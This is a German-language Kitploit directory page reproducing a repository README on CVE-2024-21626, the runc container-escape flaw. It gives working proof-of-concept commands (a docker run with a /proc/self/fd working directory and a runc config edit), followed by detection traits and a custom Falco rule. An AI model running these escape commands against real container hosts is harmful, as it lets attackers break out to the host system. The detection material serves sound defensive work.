Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-21626 — PoC und Erkennung für CVE-2024-21626 | Kitploit
Tools/GitHubGitHub/nitrocao/cve-2024-21626
Container-SicherheitSchwachstellenanalyseExploitationEinbruchserkennungIncident ResponseContainer-Ausbruch
GitHubnitrocao/cve-2024-21626

CVE-2024-21626

PoC und Erkennung für CVE-2024-21626

Repository anzeigen
7712vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-21626

Eine detaillierte Erklärung dieser Sicherheitslücke finden Sie in meinem Artikel.

Exploit

Exploit durch Ausführen eines Containers

Es ist nicht nötig, ein benutzerdefiniertes Image zu erstellen, führen Sie einfach einen Container mit dem Parameter -w aus:

root@kitploit:~
docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm

Exploit durch Ausführen eines Containers

Exploit durch Exec in einen laufenden Container

Exploit durch Exec in einen laufenden Container

Exploit durch runc selbst

root@kitploit:~
~/container/runc/runc --version
docker run --name helper-ctr alpine
docker export helper-ctr --output alpine.tar
mkdir rootfs
tar xf alpine.tar -C rootfs
~/container/runc/runc spec
sed -ri 's#(\s*"cwd": )"(/)"#\1 "/proc/self/fd/7"#g' config.json
grep cwd config.json
sudo ~/container/runc/runc --log ./log.json run demo

Exploit durch runc selbst

Erkennung

Die Exploits haben die folgenden Merkmale:

  • Ein Container wird execve(2) für einen Prozess ausführen, dessen Arbeitsverzeichnis mit /proc/self/fd/ beginnt.
  • Ein Container wird symbolische Links via symlink(2) oder symlinkat(2) mit einem speziellen Zielverzeichnis-Link erstellen, der mit /proc/self/fd/ beginnt.
  • Ein Container wird Dateien via open(2), openat(2) oder openat2(2) mit Dateinamen wie /proc/\d+/cwd/.* öffnen.

Leaky Vessels Dynamic Detector von Snyk

https://github.com/snyk/leaky-vessels-dynamic-detector

Falco

Hier ist die benutzerdefinierte Falco-Regel:

root@kitploit:~
- macro: container
  condition: (container.id != host and container.name exists)

- rule: CVE-2024-21626 (runC escape through /proc/[PID]/cwd) exploited
  desc: >
    Detect CVE-2024-21626, runC escape vulerability through /proc/[PID]/cwd.
  condition: >
    container and ((evt.type = execve and proc.cwd startswith "/proc/self/fd") or (evt.type in (open, openat, openat2) and fd.name glob "/proc/*/cwd/*") or (evt.type in (symlink, symlinkat) and fs.path.target startswith "/proc/self/fd/")) and proc.name != "runc:[1:CHILD]"
  output: CVE-2024-21626 exploited (%container.info evt_type=%evt.type process=%proc.name command=%proc.cmdline target=%fs.path.targetraw)
  priority: CRITICAL

Aber das Filtern von Fehlalarmen mit proc.name ist keine gute Idee.

Erkennung von Exploits mit Falco

Referenzen

  • https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv
  • https://github.com/opencontainers/runc/commit/8e1cd2f56d518f8d6292b8bb39f0d0932e4b6c2a
  • https://github.com/opencontainers/runc/commit/f2f16213e174fb63e931fe0546bbbad1d9bbed6f
  • https://github.com/opencontainers/runc/commit/89c93ddf289437d5c8558b37047c54af6a0edb48
  • https://github.com/opencontainers/runc/commit/ee73091a8d28692fa4868bac81aa40a0b05f9780
  • https://access.redhat.com/security/cve/cve-2024-21626
  • https://github.com/snyk/leaky-vessels-dynamic-detector
  • https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-21626
  • https://github.com/snyk/leaky-vessels-dynamic-detector
Tool herunterladen